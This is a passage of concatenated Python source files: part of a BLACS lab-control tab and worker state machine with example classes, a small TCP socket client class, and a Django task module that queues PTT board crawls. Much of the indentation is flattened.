self.last_requested_state = None
return data
# Make this function available globally:
get_unique_id = Counter().get
def define_state(allowed_modes,queue_state_indefinitely,delete_stale_states=False):
def wrap(function):
unescaped_name = function.__name__
escapedname = '_' + function.__name__
if allowed_modes < 1 or allowed_modes > 15:
            raise RuntimeError('Function %s has been set to run in unknown states. Please make sure allowed states is one or more of MODE_MANUAL, '%unescaped_name+
                               'MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL and MODE_BUFFERED (or-ed together using the | symbol, e.g. MODE_MANUAL|MODE_BUFFERED)')
def f(self,*args,**kwargs):
function.__name__ = escapedname
#setattr(self,escapedname,function)
self.event_queue.put(allowed_modes,queue_state_indefinitely,delete_stale_states,[function,[args,kwargs]])
f.__name__ = unescaped_name
f._allowed_modes = allowed_modes
return f
return wrap
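# For instance, a Tab method that should only run via the state machine while in manual mode would
# typically be declared as below (the method and worker/job names are placeholders; see MyTab
# further down for complete, runnable examples):
#
#   @define_state(MODE_MANUAL, True)
#   def do_something(self):
#       results = yield(self.queue_work('my_worker', 'some_job', arg1, arg2))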
class Tab(object):
def __init__(self,notebook,settings,restart=False):
# Store important parameters
self.notebook = notebook
self.settings = settings
self._device_name = self.settings["device_name"]
# Setup logging
self.logger = logging.getLogger('BLACS.%s'%(self.device_name))
self.logger.debug('Started')
# Setup the timer for updating that tab text label when the tab is not
# actively part of a notebook
self._tab_text_timer = QTimer()
self._tab_text_timer.timeout.connect(self.update_tab_text_colour)
self._tab_text_colour = 'black'
# Create instance variables
self._not_responding_error_message = ''
self._error = ''
self._state = ''
self._time_of_last_state_change = time.time()
self.not_responding_for = 0
self.hide_not_responding_error_until = 0
self._timeouts = set()
self._timeout_ids = {}
self._force_full_buffered_reprogram = True
self.event_queue = StateQueue(self.device_name)
self.workers = {}
self._supports_smart_programming = False
self._restart_receiver = []
# Load the UI
self._ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)),'tab_frame.ui'))
self._layout = self._ui.device_layout
self._device_widget = self._ui.device_controls
self._changed_widget = self._ui.changed_widget
self._changed_layout = self._ui.changed_layout
self._changed_widget.hide()
self.BLACS_connection = self.settings['connection_table'].find_by_name(self.device_name).BLACS_connection
self._ui.device_name.setText("<b>%s</b> <br />Connection: %s"%(str(self.device_name),str(self.BLACS_connection)))
# connect signals
self._ui.smart_programming.toggled.connect(self.on_force_full_buffered_reprogram)
self._ui.smart_programming.setEnabled(False)
self.force_full_buffered_reprogram = True
self._ui.button_close.clicked.connect(self.hide_error)
self._ui.button_restart.clicked.connect(self.restart)
self._update_error()
self.supports_smart_programming(False)
        # This should be done before the mainloop starts or else there is a race condition as to whether the
# self._mode variable is even defined!
# However it must be done after the UI is created!
self.mode = MODE_MANUAL
self.state = 'idle'
# Setup the not responding timeout
self._timeout = QTimer()
self._timeout.timeout.connect(self.check_time)
self._timeout.start(1000)
# Launch the mainloop
self._mainloop_thread = threading.Thread(target = self.mainloop)
self._mainloop_thread.daemon = True
self._mainloop_thread.start()
# Add the tab to the notebook
self.notebook.addTab(self._ui,self.device_name)
self._ui.show()
def supports_smart_programming(self,support):
self._supports_smart_programming = bool(support)
if self._supports_smart_programming:
self._ui.smart_programming.show()
else:
self._ui.smart_programming.hide()
def on_force_full_buffered_reprogram(self,toggled):
self.force_full_buffered_reprogram = toggled
@property
def force_full_buffered_reprogram(self):
return self._force_full_buffered_reprogram
@force_full_buffered_reprogram.setter
def force_full_buffered_reprogram(self,value):
self._force_full_buffered_reprogram = bool(value)
self._ui.smart_programming.setChecked(bool(value))
@property
@inmain_decorator(True)
def error_message(self):
return self._error
@error_message.setter
@inmain_decorator(True)
def error_message(self,message):
#print message
#print self._error
if message != self._error:
self._error = message
self._update_error()
@inmain_decorator(True)
def _update_error(self):
prefix = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:"MS Shell Dlg 2"; font-size:7.8pt; font-weight:400; font-style:normal;">'
suffix = '</body></html>'
#print threading.current_thread().name
self._ui.error_message.setHtml(prefix+self._not_responding_error_message+self._error+suffix)
if self._error or self._not_responding_error_message:
self._ui.notresponding.show()
self._tab_text_colour = 'red'
self.update_tab_text_colour()
else:
self._ui.notresponding.hide()
self._tab_text_colour = 'black'
self.update_tab_text_colour()
@inmain_decorator(True)
def update_tab_text_colour(self):
try:
self.notebook = self._ui.parentWidget().parentWidget()
currentpage = None
if self.notebook:
#currentpage = self.notebook.get_current_page()
currentpage = self.notebook.indexOf(self._ui)
if currentpage == -1:
raise Exception('')
else:
self.notebook.tabBar().setTabTextColor(currentpage,QColor(self._tab_text_colour))
self._tab_text_timer.stop()
else:
raise Exception('')
except Exception:
if not self._tab_text_timer.isActive():
self._tab_text_timer.start(100)
def get_tab_layout(self):
return self._layout
@property
def device_name(self):
return self._device_name
    # sets the mode, switches between MANUAL, BUFFERED, TRANSITION_TO_BUFFERED and TRANSITION_TO_MANUAL
@property
def mode(self):
return self._mode
@mode.setter
def mode(self,mode):
self._mode = mode
self._update_state_label()
@property
def state(self):
return self._state
@state.setter
def state(self,state):
self._state = state
self._time_of_last_state_change = time.time()
self._update_state_label()
@inmain_decorator(True)
def _update_state_label(self):
if self.mode == 1:
mode = 'Manual'
elif self.mode == 2:
mode = 'Transitioning to buffered'
elif self.mode == 4:
mode = 'Transitioning to manual'
elif self.mode == 8:
mode = 'Buffered'
else:
raise RuntimeError('self.mode for device %s is invalid. It must be one of MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL or MODE_BUFFERED'%(self.device_name))
self._ui.state_label.setText('<b>%s mode</b> - State: %s'%(mode,self.state))
# Todo: Update icon in tab
def create_worker(self,name,WorkerClass,workerargs={}):
if name in self.workers:
raise Exception('There is already a worker process with name: %s'%name)
if name == 'GUI':
# This is here so that we can display "(GUI)" in the status bar and have the user confident this is actually happening in the GUI,
# not in a worker process named GUI
raise Exception('You cannot call a worker process "GUI". Why would you want to? Your worker process cannot interact with the BLACS GUI directly, so you are just trying to confuse yourself!')
worker = WorkerClass()
to_worker, from_worker = worker.start(name, self.device_name, workerargs)
self.workers[name] = (worker,to_worker,from_worker)
self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,[Tab._initialise_worker,[(name,),{}]],prepend=True)
def _initialise_worker(self, worker_name):
yield(self.queue_work(worker_name,'init'))
if self.error_message:
raise Exception('Device failed to initialise')
@define_state(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True)
def _timeout_add(self,delay,execute_timeout):
QTimer.singleShot(delay,execute_timeout)
def statemachine_timeout_add(self,delay,statefunction,*args,**kwargs):
# Add the timeout to our set of registered timeouts. Timeouts
        # can thus be removed by the user at any time by calling
        # self.statemachine_timeout_remove(statefunction)
self._timeouts.add(statefunction)
# Here's a function which executes the timeout once, then queues
# itself up again after a delay:
def execute_timeout():
# queue up the state function, but only if it hasn't been
# removed from self.timeouts:
if statefunction in self._timeouts and self._timeout_ids[statefunction] == unique_id:
# Only queue up the state if we are in an allowed mode
if statefunction._allowed_modes&self.mode:
statefunction(*args, **kwargs)
# queue up another call to this function (execute_timeout)
# after the delay time:
self._timeout_add(delay,execute_timeout)
# Store a unique ID for this timeout so that we don't confuse
# other timeouts for this one when checking to see that this
# timeout hasn't been removed:
unique_id = get_unique_id()
self._timeout_ids[statefunction] = unique_id
# queue the first run:
#QTimer.singleShot(delay,execute_timeout)
execute_timeout()
# Returns True if the timeout was removed
def statemachine_timeout_remove(self,statefunction):
if statefunction in self._timeouts:
self._timeouts.remove(statefunction)
return True
return False
# returns True if at least one timeout was removed, else returns False
def statemachine_timeout_remove_all(self):
# As a consistency check, we overwrite self._timeouts to an empty set always
# This must be done after the check to see if it is empty (if self._timeouts) so do not refactor this code!
if self._timeouts:
self._timeouts = set()
return True
else:
self._timeouts = set()
return False
# def set_state(self,state):
# ready = self.tab_label_widgets['ready']
# working = self.tab_label_widgets['working']
# error = self.tab_label_widgets['error']
# self.logger.info('State changed to %s'% state)
# self.state = state
# if state == 'idle':
# working.hide()
# if self.error:
# error.show()
# else:
# ready.show()
# error.hide()
# elif state == 'fatal error':
# working.hide()
# error.show()
# ready.hide()
# else:
# ready.hide()
# working.show()
# self._time_of_last_state_change = time.time()
# self.statusbar.push(self.context_id, state)
def close_tab(self,*args):
self.logger.info('close_tab called')
self._timeout.stop()
self._tab_text_timer.stop()
for name,worker_data in self.workers.items():
worker_data[0].terminate()
# The mainloop is blocking waiting for something out of the
# from_worker queue or the event_queue. Closing the queues doesn't
# seem to raise an EOF for them, likely because it only closes
# them from our end, and an EOFError would only be raised if it
# was closed from the other end, which we can't make happen. But
# we can instruct it to quit by telling it to do so through the
# queue itself. That way we don't leave extra threads running
# (albeit doing nothing) that we don't need:
if self._mainloop_thread.is_alive():
worker_data[2].put((False,'quit',None))
self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,['_quit',None],prepend=True)
self.notebook = self._ui.parentWidget().parentWidget()
currentpage = None
if self.notebook:
#currentpage = self.notebook.get_current_page()
currentpage = self.notebook.indexOf(self._ui)
self.notebook.removeTab(currentpage)
temp_widget = QWidget()
self.notebook.insertTab(currentpage, temp_widget, self.device_name)
self.notebook.setCurrentWidget(temp_widget)
return currentpage
def connect_restart_receiver(self,function):
if function not in self._restart_receiver:
self._restart_receiver.append(function)
def disconnect_restart_receiver(self,function):
if function in self._restart_receiver:
self._restart_receiver.remove(function)
def restart(self,*args):
# notify all connected receivers:
for f in self._restart_receiver:
try:
f(self.device_name)
except:
self.logger.exception('Could not notify a connected receiver function')
currentpage = self.close_tab()
self.logger.info('***RESTART***')
self.settings['saved_data'] = self.get_save_data()
self._restart_thread = inthread(self.wait_for_mainloop_to_stop, currentpage)
def wait_for_mainloop_to_stop(self, currentpage):
self._mainloop_thread.join()
inmain(self.clean_ui_on_restart)
inmain(self.finalise_restart, currentpage)
def clean_ui_on_restart(self):
# Clean up UI
ui = self._ui
self._ui = None
ui.setParent(None)
ui.deleteLater()
del ui
def finalise_restart(self, currentpage):
widget = self.notebook.widget(currentpage)
widget.setParent(None)
widget.deleteLater()
del widget
# Note: the following function call will break if the user hasn't
# overridden the __init__ function to take these arguments. So
# make sure you do that!
self.__init__(self.notebook, self.settings,restart=True)
# The init method is going to place this device tab at the end of the notebook specified
        # Let's remove it from there, and place it in the position it used to be!
self.notebook = self._ui.parentWidget().parentWidget()
self.notebook.removeTab(self.notebook.indexOf(self._ui))
self.notebook.insertTab(currentpage,self._ui,self.device_name)
self.notebook.setCurrentWidget(self._ui)
# If BLACS is waiting on this tab for something, tell it to abort!
# self.BLACS.current_queue.put('abort')
def queue_work(self,worker_process,worker_function,*args,**kwargs):
return worker_process,worker_function,args,kwargs
def hide_error(self):
        # don't show the error again until the not responding time has doubled:
self.hide_not_responding_error_until = 2*self.not_responding_for
self._ui.notresponding.hide()
self.error_message = ''
#self.tab_label_widgets['error'].hide()
#if self.state == 'idle':
# self.tab_label_widgets['ready'].show()
def check_time(self):
if self.state in ['idle','fatal error']:
self.not_responding_for = 0
if self._not_responding_error_message:
self._not_responding_error_message = ''
self._update_error()
else:
self.not_responding_for = time.time() - self._time_of_last_state_change
if self.not_responding_for > 5 + self.hide_not_responding_error_until:
                self.hide_not_responding_error_until = 0
self._ui.notresponding.show()
hours, remainder = divmod(int(self.not_responding_for), 3600)
minutes, seconds = divmod(remainder, 60)
if hours:
s = '%s hours'%hours
elif minutes:
s = '%s minutes'%minutes
else:
s = '%s seconds'%seconds
self._not_responding_error_message = 'The hardware process has not responded for %s.<br /><br />'%s
self._update_error()
return True
def mainloop(self):
logger = logging.getLogger('BLACS.%s.mainloop'%(self.settings['device_name']))
logger.debug('Starting')
# Store a reference to the state queue and workers, this way if the tab is restarted, we won't ever get access to the new state queue created then
event_queue = self.event_queue
workers = self.workers
try:
while True:
# Get the next task from the event queue:
logger.debug('Waiting for next event')
func, data = event_queue.get(self.mode)
if func == '_quit':
# The user has requested a restart:
logger.debug('Received quit signal')
break
args,kwargs = data
logger.debug('Processing event %s' % func.__name__)
self.state = '%s (GUI)'%func.__name__
# Run the task with the GUI lock, catching any exceptions:
#func = getattr(self,funcname)
# run the function in the Qt main thread
generator = inmain(func,self,*args,**kwargs)
# Do any work that was queued up:(we only talk to the worker if work has been queued up through the yield command)
if type(generator) == GeneratorType:
# We need to call next recursively, queue up work and send the results back until we get a StopIteration exception
generator_running = True
break_main_loop = False
# get the data from the first yield function
worker_process,worker_function,worker_args,worker_kwargs = inmain(generator.next)
# Continue until we get a StopIteration exception, or the user requests a restart
while generator_running:
try:
logger.debug('Instructing worker %s to do job %s'%(worker_process,worker_function) )
worker_arg_list = (worker_function,worker_args,worker_kwargs)
                            # This is to catch the case where you try to pass unpickleable objects.
try:
cPickle.dumps(worker_arg_list)
except:
self.error_message += 'Attempt to pass unserialisable object to child process:'
raise
# Send the command to the worker
to_worker = workers[worker_process][1]
from_worker = workers[worker_process][2]
to_worker.put(worker_arg_list)
self.state = '%s (%s)'%(worker_function,worker_process)
# Confirm that the worker got the message:
logger.debug('Waiting for worker to acknowledge job request')
success, message, results = from_worker.get()
if not success:
if message == 'quit':
# The user has requested a restart:
logger.debug('Received quit signal')
# This variable is set so we also break out of the toplevel main loop
break_main_loop = True
break
logger.info('Worker reported failure to start job')
raise Exception(message)
# Wait for and get the results of the work:
logger.debug('Worker reported job started, waiting for completion')
success,message,results = from_worker.get()
if not success and message == 'quit':
# The user has requested a restart:
logger.debug('Received quit signal')
# This variable is set so we also break out of the toplevel main loop
break_main_loop = True
break
if not success:
logger.info('Worker reported exception during job')
now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime())
self.error_message += ('Exception in worker - %s:<br />' % now +
                                                       '<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%cgi.escape(message).replace(' ','&nbsp;').replace('\n','<br />'))
else:
logger.debug('Job completed')
# Reset the hide_not_responding_error_until, since we have now heard from the child
self.hide_not_responding_error_until = 0
# Send the results back to the GUI function
logger.debug('returning worker results to function %s' % func.__name__)
self.state = '%s (GUI)'%func.__name__
next_yield = inmain(generator.send,results)
# If there is another yield command, put the data in the required variables for the next loop iteration
if next_yield:
worker_process,worker_function,worker_args,worker_kwargs = next_yield
except StopIteration:
# The generator has finished. Ignore the error, but stop the loop
logger.debug('Finalising function')
generator_running = False
# Break out of the main loop if the user requests a restart
if break_main_loop:
logger.debug('Breaking out of main loop')
break
self.state = 'idle'
except:
# Some unhandled error happened. Inform the user, and give the option to restart
message = traceback.format_exc()
logger.critical('A fatal exception happened:\n %s'%message)
now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime())
self.error_message += ('Fatal exception in main process - %s:<br /> '%now +
                                   '<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%cgi.escape(message).replace(' ','&nbsp;').replace('\n','<br />'))
self.state = 'fatal error'
# do this in the main thread
inmain(self._ui.button_close.setEnabled,False)
logger.info('Exiting')
class Worker(Process):
def init(self):
# To be overridden by subclasses
pass
def run(self, worker_name, device_name, extraargs):
self.worker_name = worker_name
self.device_name = device_name
for argname in extraargs:
setattr(self,argname,extraargs[argname])
# Total fudge, should be replaced with zmq logging in future:
from setup_logging import setup_logging
setup_logging()
log_name = 'BLACS.%s_%s.worker'%(self.device_name,self.worker_name)
self.logger = logging.getLogger(log_name)
self.logger.debug('Starting')
import zprocess.locking, labscript_utils.h5_lock
zprocess.locking.set_client_process_name(log_name)
#self.init()
self.mainloop()
def mainloop(self):
while True:
# Get the next task to be done:
self.logger.debug('Waiting for next job request')
funcname, args, kwargs = self.from_parent.get()
self.logger.debug('Got job request %s' % funcname)
try:
# See if we have a method with that name:
func = getattr(self,funcname)
success = True
message = ''
except AttributeError:
success = False
message = traceback.format_exc()
self.logger.error('Couldn\'t start job:\n %s'%message)
# Report to the parent whether method lookup was successful or not:
self.to_parent.put((success,message,None))
if success:
# Try to do the requested work:
self.logger.debug('Starting job %s'%funcname)
try:
results = func(*args,**kwargs)
success = True
message = ''
self.logger.debug('Job complete')
except:
results = None
success = False
traceback_lines = traceback.format_exception(*sys.exc_info())
del traceback_lines[1]
message = ''.join(traceback_lines)
self.logger.error('Exception in job:\n%s'%message)
# Check if results object is serialisable:
try:
cPickle.dumps(results)
except:
message = traceback.format_exc()
self.logger.error('Job returned unserialisable datatypes, cannot pass them back to parent.\n' + message)
message = 'Attempt to pass unserialisable object %s to parent process:\n' % str(results) + message
success = False
results = None
# Report to the parent whether work was successful or not,
# and what the results were:
self.to_parent.put((success,message,results))
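    # To summarise the protocol used above: for every job request the worker first sends an
    # acknowledgement (success, message, None) reporting whether the method lookup succeeded, and
    # only if it did is the job actually run, followed by a second (success, message, results)
    # message once it completes or raises. Tab.mainloop performs the two matching from_worker.get()
    # calls.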
# Example code! Two classes are defined below, which are subclasses
# of the ones defined above. They show how to make a Tab class,
# and a Worker class, and get the Tab to request work to be done by
# the worker in response to GUI events.
class MyTab(Tab):
def __init__(self,notebook,settings,restart=False): # restart will be true if __init__ was called due to a restart
Tab.__init__(self,notebook,settings,restart) # Make sure to call this first in your __init__!
self.create_worker('My worker',MyWorker,{'x':7})
# foobutton = gtk.Button('foo, 10 seconds!')
# barbutton = gtk.Button('bar, 10 seconds, then error!')
# bazbutton = gtk.Button('baz, 0.5 seconds!')
# addbazbutton = gtk.Button('add 2 second timeout to baz')
# removebazbutton = gtk.Button('remove baz timeout')
# bazunpickleable= gtk.Button('try to pass baz a multiprocessing.Lock()')
# fatalbutton = gtk.Button('fatal error, forgot to add @define_state to callback!')
# self.checkbutton=gtk.CheckButton('have baz\nreturn a Queue')
# self.toplevel = gtk.VBox()
# self.toplevel.pack_start(foobutton)
# self.toplevel.pack_start(barbutton)
# hbox = gtk.HBox()
# self.toplevel.pack_start(hbox)
# hbox.pack_start(bazbutton)
# hbox.pack_start(addbazbutton)
# hbox.pack_start(removebazbutton)
# hbox.pack_start(bazunpickleable)
# hbox.pack_start(self.checkbutton)
# self.toplevel.pack_start(fatalbutton)
# foobutton.connect('clicked', self.foo)
# barbutton.connect('clicked', self.bar)
# bazbutton.connect('clicked', self.baz)
# fatalbutton.connect('clicked',self.fatal )
# addbazbutton.connect('clicked',self.add_baz_timeout)
# removebazbutton.connect('clicked',self.remove_baz_timeout)
# bazunpickleable.connect('clicked', self.baz_unpickleable)
        # # These two lines are required to add the top level widget (buttonbox
# # in this case) to the existing GUI:
# self.viewport.add(self.toplevel)
# self.toplevel.show_all()
self.initUI()
def initUI(self):
self.layout = self.get_tab_layout()
foobutton = QPushButton('foo, 10 seconds!')
barbutton = QPushButton('bar, 10 seconds, then error!')
bazbutton = QPushButton('baz, 0.5 seconds!')
addbazbutton = QPushButton('add 2 second timeout to baz')
removebazbutton = QPushButton('remove baz timeout')
bazunpickleable= QPushButton('try to pass baz a threading.Lock()')
fatalbutton = QPushButton('fatal error, forgot to add @define_state to callback!')
self.checkbutton = QPushButton('have baz\nreturn a Queue')
self.checkbutton.setCheckable(True)
#self.device_widget.addWidget(layout)
self.layout.addWidget(foobutton)
self.layout.addWidget(barbutton)
self.layout.addWidget(bazbutton)
self.layout.addWidget(addbazbutton)
self.layout.addWidget(removebazbutton)
self.layout.addWidget(bazunpickleable)
self.layout.addWidget(fatalbutton)
self.layout.addWidget(self.checkbutton)
foobutton.clicked.connect(self.foo)
barbutton.clicked.connect(self.bar)
bazbutton.clicked.connect(self.baz)
fatalbutton.clicked.connect(self.fatal )
addbazbutton.clicked.connect(self.add_baz_timeout)
removebazbutton.clicked.connect(self.remove_baz_timeout)
bazunpickleable.clicked.connect(self.baz_unpickleable)
    # It is critical that you decorate your callbacks with @define_state
    # as below. This makes the function get queued up and executed
    # in turn by our state machine instead of immediately by the
    # Qt mainloop. Only don't decorate if you're certain that your
    # callback can safely happen no matter what state the system is
    # in (for example, adjusting the axis range of a plot, or other
    # appearance settings). You should never be calling queue_work
    # from an undecorated callback.
@define_state(MODE_MANUAL,True)
def foo(self):
self.logger.debug('entered foo')
#self.toplevel.set_sensitive(False)
        # Here's how you instruct the worker process to do
        # something. When you yield the result of queue_work, the
        # worker will be requested to do whatever you asked for (in
        # this case, MyWorker.foo(5,6,7,x='x') ). No further events
        # will be processed until that work is done. Once the work is
        # done, execution resumes here and the worker's return value
        # becomes the value of the yield expression.
results = yield(self.queue_work('My worker','foo', 5,6,7,x='x'))
#self.toplevel.set_sensitive(True)
self.logger.debug('leaving foo')
# Here's what's NOT to do: forgetting to decorate a callback with @define_state
# when it's not something that can safely be done asynchronously
# to the state machine:
def fatal(self):
# This bug could be hard to track because nothing will happen
# when you click the button -- only once you do some other,
        # correctly decorated callback will it become apparent that
# something is wrong. So don't make this mistake!
self.queue_work('My worker','foo', 5,6,7,x='x')
@define_state(MODE_MANUAL,True)
def bar(self):
self.logger.debug('entered bar')
results = yield(self.queue_work('My worker','bar', 5,6,7,x=5))
self.logger.debug('leaving bar')
@define_state(MODE_MANUAL,True)
def baz(self, button=None):
print threading.current_thread().name
self.logger.debug('entered baz')
results = yield(self.queue_work('My worker','baz', 5,6,7,x='x',return_queue=self.checkbutton.isChecked()))
print results
print threading.current_thread().name
results = yield(self.queue_work('My worker','baz', 4,6,7,x='x',return_queue=self.checkbutton.isChecked()))
print results
print threading.current_thread().name
self.logger.debug('leaving baz')
    # This shows what happens if you try to send an unpickleable
    # object through a queue to the subprocess:
@define_state(MODE_MANUAL,True)
def baz_unpickleable(self):
self.logger.debug('entered baz_unpickleable')
results = yield(self.queue_work('My worker','baz', 5,6,7,x=threading.Lock()))
self.logger.debug('leaving baz_unpickleable')
# You don't need to decorate with @define_state if all you're
# doing is adding a timeout -- adding a timeout can safely be done
# asynchronously. But you can still decorate if you want, and you
# should if you're doing other work in the same function call which
# can't be done asynchronously.
def add_baz_timeout(self):
self.statemachine_timeout_add(2000,self.baz)
# Similarly, no @define_state is required here -- same applies as above.
def remove_baz_timeout(self):
self.statemachine_timeout_remove(self.baz)
class MyWorker(Worker):
def init(self):
# You read correctly, this isn't __init__, it's init. It's the
# first thing that will be called in the new process. You should
# do imports here, define instance variables, that sort of thing. You
# shouldn't import the hardware modules at the top of your file,
# because then they will be imported in both the parent and
        # the child processes and won't be cleanly restarted when the subprocess
# is restarted. Since we're inside a method call though, you'll
# have to use global statements for the module imports, as shown
# below. Either that or you can make them instance variables, ie:
# import module; self.module = module. Up to you, I prefer
# the former.
global serial; import serial
self.logger.info('got x! %d' % self.x)
raise Exception('bad import!')
    # Here's a function that will be called when requested by the parent
    # process. There's nothing special about it really. Its return
    # value will be sent back to the parent, where it becomes the value
    # of the yield expression that queued this job.
def foo(self,*args,**kwargs):
self.logger.debug('working on foo!')
time.sleep(10)
return 'results!!!'
def bar(self,*args,**kwargs):
self.logger.debug('working on bar!')
time.sleep(10)
raise Exception('error!')
return 'results!!!'
def baz(self,zzz,*args,**kwargs):
self.logger.debug('working on baz: time is %s'%repr(time.time()))
time.sleep(0.5)
if kwargs['return_queue']:
return Queue()
return 'results%d!!!'%zzz
if __name__ == '__main__':
import sys
import logging.handlers
# Setup logging:
logger = logging.getLogger('BLACS')
handler = logging.handlers.RotatingFileHandler('BLACS.log', maxBytes=1024**2, backupCount=0)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
if sys.stdout.isatty():
terminalhandler = logging.StreamHandler(sys.stdout)
terminalhandler.setFormatter(formatter)
terminalhandler.setLevel(logging.INFO)
logger.addHandler(terminalhandler)
else:
        sys.stdout = sys.stderr = open(os.devnull, 'w')
logger.setLevel(logging.DEBUG)
#labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
if __name__ == '__main__':
from labscript_utils.qtwidgets.dragdroptab import DragDropTabWidget
app = QApplication(sys.argv)
window = QWidget()
layout = QVBoxLayout(window)
notebook = DragDropTabWidget()
layout.addWidget(notebook)
class FakeConnection(object):
def __init__(self):
self.BLACS_connection = 'None'
class FakeConnectionTable(object):
def __init__(self):
pass
def find_by_name(self, device_name):
return FakeConnection()
connection_table = FakeConnectionTable()
tab1 = MyTab(notebook,settings = {'device_name': 'Example', 'connection_table':connection_table})
tab2 = MyTab(notebook,settings = {'device_name': 'Example2', 'connection_table':connection_table})
window.show()
#notebook.show()
def run():
app.exec_()
tab1.close_tab()
tab2.close_tab()
sys.exit(run())
# Run the demo!:
# gtk.gdk.threads_init()
# window = gtk.Window()
# notebook = gtk.Notebook()
# window.connect('destroy',lambda widget: gtk.main_quit())
# window.add(notebook)
# notebook.show()
# window.show()
# window.resize(800,600)
# with gtk.gdk.lock:
# gtk.main()
|
socket.py
|
# ============================================================================
# FILE: socket.py
# AUTHOR: Rafael Bodill <justRafi at gmail.com>
# License: MIT license
# ============================================================================
import socket
from threading import Thread
from queue import Queue
from time import time, sleep
class Socket(object):
def __init__(self, host, port, commands, context, timeout):
self.__enc = context.get('encoding', 'utf-8')
self.__eof = False
self.__outs = []
self.__timeout = timeout
self.__context = context
self.__sock = self.connect(host, port, self.__timeout)
self.__welcome = self.receive()
self.sendall(commands)
self.__queue_out = Queue()
self.__thread = Thread(target=self.enqueue_output)
self.__thread.start()
@property
def welcome(self):
return self.__welcome
def eof(self):
return self.__eof
def kill(self):
if self.__sock is not None:
self.__sock.close()
self.__sock = None
self.__queue_out = None
self.__thread.join(1.0)
self.__thread = None
def sendall(self, commands):
for command in commands:
self.__sock.sendall('{}\n'.format(command).encode(self.__enc))
def receive(self, bytes=1024):
return self.__sock.recv(bytes).decode(
self.__enc, errors='replace')
def connect(self, host, port, timeout):
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, socket.IPPROTO_TCP,
socket.AI_ADDRCONFIG):
family, socket_type, proto, canon_name, sa = res
sock = None
try:
sock = socket.socket(family, socket_type, proto)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
sock.settimeout(timeout)
sock.connect(sa)
return sock
except socket.error as e:
if sock is not None:
sock.close()
if e is not None:
raise e
else:
raise OSError('Socket: getaddrinfo returns an empty list')
def enqueue_output(self):
if not self.__queue_out:
return
buffer = self.receive(2048)
buffering = True
while buffering:
if '\n' in buffer:
(line, buffer) = buffer.split('\n', 1)
self.__queue_out.put(line)
else:
more = self.receive()
if not more:
buffering = False
else:
buffer += more
def communicate(self, timeout):
if not self.__sock:
return []
start = time()
outs = []
if self.__queue_out.empty():
sleep(0.1)
while not self.__queue_out.empty() and time() < start + timeout:
outs.append(self.__queue_out.get_nowait())
if self.__thread.is_alive() or not self.__queue_out.empty():
return outs
self.__eof = True
self.__sock = None
self.__thread = None
        self.__queue_out = None
return outs
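# Rough usage sketch (illustrative only; the host, port and command below are hypothetical, and in
# practice the owning plugin supplies `context` and polls communicate() periodically):
#
#   sock = Socket('localhost', 12345, ['some-command'], {'encoding': 'utf-8'}, timeout=2.0)
#   print(sock.welcome)
#   for line in sock.communicate(timeout=0.5):
#       print(line)
#   if not sock.eof():
#       sock.kill()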
|
tasks.py
|
import threading
from django.db import transaction
from .models import CrawlTask, TaskStatus
from .PttSpider.ptt_spider import PttArticleListSpider, PttArticleSpider
from .PttSpider.ptt_spider import Push, ArticleInfo
from .PttSpider.ptt_spider import PttUrl, PttUrlType
from .taskpool import TaskPool
TASK_POOL_SIZE = 5
def set_task_status(task, status):
with transaction.atomic():
task.status = status
task.save(update_fields=['status', 'update_time'])
def put_task_error(task):
set_task_status(task, TaskStatus.ERROR)
raise
def board_handler(board_url):
spider = PttArticleListSpider(board_url, max_fetch=10)
spider.run()
url_list = spider.article_url_list
if len(url_list) == 0:
return []
article_list = []
for url in url_list:
try:
spider = PttArticleSpider(url)
spider.run()
article = spider.article
except Exception as e:
print(f"Get Exception {e}")
article = ArticleInfo()
finally:
            article_list.append(article)
return article_list
def get_parsing_handler(url):
url_type = PttUrl(url).type
if url_type != PttUrlType.BOARD:
return None
return board_handler
def c_task(tid, url):
try:
with transaction.atomic():
task = CrawlTask.objects.get(id=tid)
except CrawlTask.DoesNotExist as e:
print(f"Get task error {e}")
raise
set_task_status(task, TaskStatus.RUNNING)
handler = get_parsing_handler(url)
    if handler is None:
        set_task_status(task, TaskStatus.ERROR)
        raise ValueError(f"No parsing handler available for url: {url}")
try:
article_list = handler(url)
except Exception as e:
put_task_error(task)
#create_posts(article_list)
set_task_status(task, TaskStatus.FINISH)
m = None
def crawler_init():
global m
def start_monitor():
def monitor():
m.run()
threading.Thread(target=monitor).start()
print("start monitoring")
if m is not None:
return
objs = CrawlTask.objects.exclude(status=TaskStatus.ERROR)
objs.update(status=TaskStatus.FINISH)
m = TaskPool(TASK_POOL_SIZE)
start_monitor()
def create_crawl_task(url):
with transaction.atomic():
task, _ = CrawlTask.objects.get_or_create(
url=url,
defaults={'name':url, 'url':url, 'status':TaskStatus.QUEUING},
)
try:
success = m.add(c_task, task.id, task.id, url)
if not success:
set_task_status(task, TaskStatus.ERROR)
except Exception as e:
success = False
print("add task fail")
return success
__all__ = ['crawler_init' , 'create_crawl_task']
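# Rough usage sketch (illustrative only; assumes Django is configured, and the board URL is just an
# example): call crawler_init() once at startup to spin up the task pool monitor, then enqueue one
# crawl task per board URL.
#
#   crawler_init()
#   create_crawl_task('https://www.ptt.cc/bbs/Gossiping/index.html')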
|
